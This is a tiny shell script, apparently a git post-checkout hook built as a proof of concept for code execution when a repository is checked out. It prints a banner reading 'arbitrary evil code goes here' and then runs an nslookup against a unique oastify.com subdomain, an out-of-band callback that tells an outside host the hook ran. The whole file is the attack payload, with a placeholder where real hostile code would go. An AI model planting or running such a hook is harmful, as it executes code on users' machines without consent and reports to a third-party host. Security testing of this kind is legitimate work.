#!/bin/sh
echo '=================================='
echo ' arbitrary evil code goes here ;) '
echo '=================================='
nslookup post-checkout.dzg3dtru4ophaipfnpwpfep1fsli97.oastify.com
